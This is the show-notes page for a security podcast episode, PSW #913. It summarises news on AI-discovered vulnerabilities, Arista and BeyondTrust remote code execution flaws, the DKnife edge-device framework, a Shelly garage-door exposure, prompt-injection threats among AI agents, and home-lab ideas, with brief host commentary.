View More PSW Episodes

AI Vulnerability Hunting – PSW #913

In the security news: Viral AI prompts Things to do in your home security lab I can open your garage door They call me DKnife Beyondtrust RCE Cool AI device Robots need your body Meta is just full of scams, phishing, and malware Claude Opus 4.6 found more than 500 high-severity vulnerabilities Arista next gen firewalls and command injection Secure Boot updates The RCE AMD won’t fix and why the article went away End of support means get it off the network Accidentally giving away $44 billion of Bitcoin Visit https://www.securityweekly.com/psw for all the latest episodes!

Full Show Notes
Segment One

AI Vulnerability Hunting – PSW #913

In the security news:

  • Viral AI prompts
  • Things to do in your home security lab
  • I can open your garage door
  • They call me DKnife
  • Beyondtrust RCE
  • Cool AI device
  • Robots need your body
  • Meta is just full of scams, phishing, and malware
  • Claude Opus 4.6 found more than 500 high-severity vulnerabilities
  • Arista next gen firewalls and command injection
  • Secure Boot updates
  • The RCE AMD won't fix and why the article went away
  • End of support means get it off the network
  • Accidentally giving away $44 billion of Bitcoin
Announcements

  • Security Weekly listeners save $100 on their RSAC 2026 All Access Pass! RSAC 2026 Conference will take place March 23rd to March 26th in San Francisco. To register using our discount code, please visit securityweekly.com/rsac26 and use the code 56U5SECWEEKLY! We hope to see you there!

  • Most security conferences talk about threats. Zero Trust World lets you attack them. From March 4th to 6th, 2026 in Orlando, Florida, this hands-on cybersecurity event features live hacking labs where you’ll break real environments, think like an adversary, and learn how attacks really work. You’ll also get expert sessions, real-world case studies, CPE credits, and networking with top practitioners. And yes — the Security Weekly team will be there too. Don’t miss it! Register today at securityweekly.com/ZTW.

List of Articles

Paul Asadoorian

  1. Employee Monitoring and SimpleHelp Software Abused in Ransomware Operations
  2. We hid backdoors in binaries — Opus 4.6 found 49% of them – Quesma Blog
  3. The RCE that AMD won’t fix!

    So, this article has been taken down, likely by request of AMD. What the researcher found is something that I have also observed in the past. When software or firmware does its automatic update process it can reach out to multiple URLs. Perhaps one URL is queried to see if there is an update. If there is an update it receives a list of URLs where it can retrieve the update. The other URLs may not be HTTPS. If its HTTP, it is trivial for an attacker to perform AiTM attacks. If the updates are not cryptographically signed, it means attackers now control the software and firmware on your system. This seems to be cropping up more and more...

  4. GitHub – BrownFineSecurity/iothackbot: IoT HackBot: A collection of Claude Skills and custom tooling for hybrid IoT pentesting

    "IoTHackBot is a collection of specialized tools and Claude Code skills designed for security testing of IoT devices, IP cameras, and embedded systems. It provides both command-line tools and AI-assisted workflows for comprehensive IoT security assessments." - I expect to see more of this as researchers are using Claude code to develop workflows and analyze binaries, web apps, firmware, etc...

  5. Advanced Web Shell Detection and Prevention

    Interesting Linux-based detection for PHP web shells, will probably detect some low hanging fruit and less sophisticated attackers, but cool nonetheless: "The article explains how CrowdStrike’s Linux Falcon sensor adds new capabilities to spot and stop stealthy web shells on Linux servers and containers, especially obfuscated and pre-existing PHP shells."

  6. Zero Day Initiative — CVE-2025-6978: Arbitrary Code Execution in the Arista NG Firewall

    Ah, good ol' command injection when parsing an HTTP header value. I feel like I have seen this several times before in other codebases (BMCs perhaps?). Also, I did not know that the Arista NG Firewall was previously "Untangle". Basically, another Linux-based appliance has a poorly protected web management application. Command injection on these platforms is dangerous for many reasons:

    • It just works - Unlike memory corruption vulnerabilities, command injections are ubiquitous. They work on all different architectures and deployments. It does not require ROP chains or platform-specific payloads, you just get to execute commands!
    • Typically the processes you are injecting are running as root, so you don't even need privelege escelation
    • Even if you had memory protections and a hardened Linux system underneath, command injection may still work as it is not trying to manipulate memory. This also means you can code it in Rust, and if it has a command injection, it will likely work just fine
  7. AI Pyramid Computing Box 4GB Version (AX8850)

    This is the coolest looking AI device! I want one!

  8. GitHub – cfinke/EpsteIn: See which of your LinkedIn connections appear in the Epstein files.

    In case you want to check your friends list... Side note: One of my favorite items in the Epstein dump is a picture of a laptop, and on the bottom there is a Windows 10 product key. According to some, it still works... See if you can find it!

  9. Remote code execution in Beyondtrust Remote Support (RS) and Privileged Remote Access (PRA)

    This seems bad, wasn't this Bomgar? "BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) contain a critical pre-authentication remote code execution vulnerability. By sending specially crafted requests, an unauthenticated remote attacker may be able to execute operating system commands in the context of the site user."

  10. 0-Days red.anthropic.com

    Do you believe this? - "Claude Opus 4.6 can find meaningful 0-day vulnerabilities in well-tested codebases, even without specialized scaffolding. Our results show that language models can add real value on top of existing discovery tools. The Safeguards work we describe above is essential to managing the dual-use risk this creates."

  11. Knife Cutting the Edge: Disclosing a China-nexus gateway-monitoring AitM framework

    This looks awesome, where do I get a copy?

    • DKnife is a gateway‑monitoring and AitM framework made up of seven Linux‑based implants designed to run on network edge gear.
    • The implants support deep packet inspection, traffic redirection and modification, and on‑device malware delivery, rather than just using the device as a simple pivot.
    • Artifact metadata indicates use since at least 2019, with active C2 infrastructure observed as of January 2026. ​* The framework performs DPI on passing traffic, harvests credentials, and selectively tampers with sessions, enabling transparent AitM on PCs, mobile, and IoT devices behind the edge device.
    • It can hijack binary downloads and Android app updates to deliver and manage ShadowPad and DarkNimbus backdoors, effectively turning routine software updates into a delivery channel. ​* The tooling includes exfiltration modules tailored to popular Chinese mobile applications and support for long‑term monitoring rather than smash‑and‑grab operations.
  12. From Fallout to Retro: How to give your Linux bootloader a total makeover

    In case you've ever wanted a custom skin on your GRUB bootloader screen, here's how to do it.

  13. Your code is now a security sensor

    "trappsec is an open-source framework that helps developers detect attackers who probe API business logic. By embedding realistic decoy routes and honey fields that are difficult to distinguish from real API constructs, attackers are nudged to authenticate — converting reconnaissance into actionable security telemetry." - Codebases are complex enough, let alone trying to figure out which API endpoints are traps and which ones are legit. However, could be neat to implement!

  14. Shelly IoT door controller config fail: leaving your garage, home and security exposed

    Wow, this is pretty bad:

    • Issue: Shelly Gen 4 devices expose an open (unauthenticated) Wi-Fi access point used for initial setup—but unlike earlier Shelly generations, the AP can remain enabled even after the device is joined to your normal Wi-Fi network, which the author frames as a security regression.
    • Why it matters: Anyone within Wi-Fi range can connect to the device’s AP and control the relay, including for garage doors/gates/doors, creating a direct physical-security risk. The post gives an example unauthenticated request that can trigger the relay (open/activate).
  15. klint – Linux Kernel Security Scanner

    Neat tool, still trying to understand the results...

  16. What to Do with Your First Home Lab

    Not much detail here, was hoping for a little more meat. In terms of things you can do with your home lab:

    • Find vulnerabilities in anything that runs firmware in your lab, find the firmware and reverse it, then look for bugs, then test them live on your gear
    • Make sure you have Windows Active Directory, you will need to learn how this works and how to break it
    • Give yourself some web applications, then use the free version of Burp to find vulnerabilities
    • Build a AiTM gateway, all traffic from the lab should go through this gateway. Have this device control DHCP/DNS, then implement AiTM attacks and inspect traffic for things like DNS requests and devices trying to update
    • Run Linux KVM/libvirt - Get an older computer, put Linux on it, enable Virtualization in the CPU via BIOS, then start spinning up targets. This is a good learning experience and I will likely do a tech segment on it. Make sure you have LOTS of disk space on this computer...

Sam Bowne

  1. The rise of Moltbook suggests viral AI prompts may be the next big security threat

    OpenClaw is also a security nightmare. Researchers at Simula Research Laboratory have identified 506 posts on Moltbook (2.6 percent of sampled content) containing hidden prompt-injection attacks. Cisco researchers documented a malicious skill called “What Would Elon Do?” that exfiltrated data to external servers, while the malware was ranked as the No. 1 skill in the skill repository. The skill’s popularity had been artificially inflated.

    Security researchers have already predicted the rise of self-replicating adversarial prompts among networks of AI agents. You might call it a “prompt worm” or a “prompt virus.” They’re self-replicating instructions that could spread through networks of communicating AI agents.

  2. New Site Lets AI Rent Human Bodies

    RentAHuman.ai is a platform for AI agents to “search, book, and pay humans for physical-world tasks.” The pitch is simple: “robots need your body.”

  3. Nearly one in three Meta ads found to point to a scam, phishing or malware

    Ads have quietly become one of the most efficient delivery mechanisms for scams, phishing and malware. Today, dangerous ads don’t look suspicious; they look professional, familiar and seem to target your exact needs.

  4. FBI Couldn’t Get into WaPo Reporter’s iPhone Because It Had Lockdown Mode Enabled

    Lockdown Mode is a sometimes overlooked feature of Apple devices that broadly make them harder to hack. A court record indicates the feature might be effective at stopping third parties unlocking someone's device. At least for now.

  5. Microsoft rolls out native Sysmon monitoring in Windows 11

    Microsoft has started rolling out built-in Sysmon functionality to some Windows 11 systems enrolled in the Windows Insider program. Although Sysmon is now natively supported in Windows, it's disabled by default, and users must explicitly enable it.

  6. New York Is the Latest State to Consider a Data Center Pause

    Red and blue states alike have introduced legislation in recent weeks that would halt data center development, citing concerns from climate to high energy prices.

  7. Evaluating and mitigating the growing risk of LLM-discovered 0-days

    Claude Opus 4.6 found more than 500 high-severity vulnerabilities, some that had gone undetected for decades. It performed fuzzing, manual analysis, and then inspected Git commits addressing memory corruption and use of dangerous functions like strstr.

  8. Secure Boot playbook for certificates expiring in 2026

    PCs manufactured before 2024 will need to install the 2023 Secure Boot CAs before the 2011 CAs start expiring in June of 2026. Regular Windows updates should deliver the CA.

  9. South Korean crypto firm accidentally sends $44 billion in bitcoins to users

    The exchange had planned to distribute small cash rewards of 2,000 Korean won ($1.40) or more to each user as part of a promotional event, but winners received at least 2,000 bitcoins each instead.

  10. New tool blocks imposter attacks disguised as safe commands

    Homoglyph attacks use foreign characters that look like English characters in a CLI. Tirith can detect homoglyph attacks over command-line environments by analyzing URLs in typed commands and stopping their execution.

  11. BOD 26-02: Mitigating Risk From End-of-Support Edge Devices

    CISA issued a binding directive to federal agencies that requires phasing out EOS edge devices.

Show More

Stay in the Know, No Smoke and Mirrors – Join Our Newsletter

Get expert insights and technical breakdowns straight to your inbox.
Join Now

Related Episodes

Related Content

You can skip this ad in 5 seconds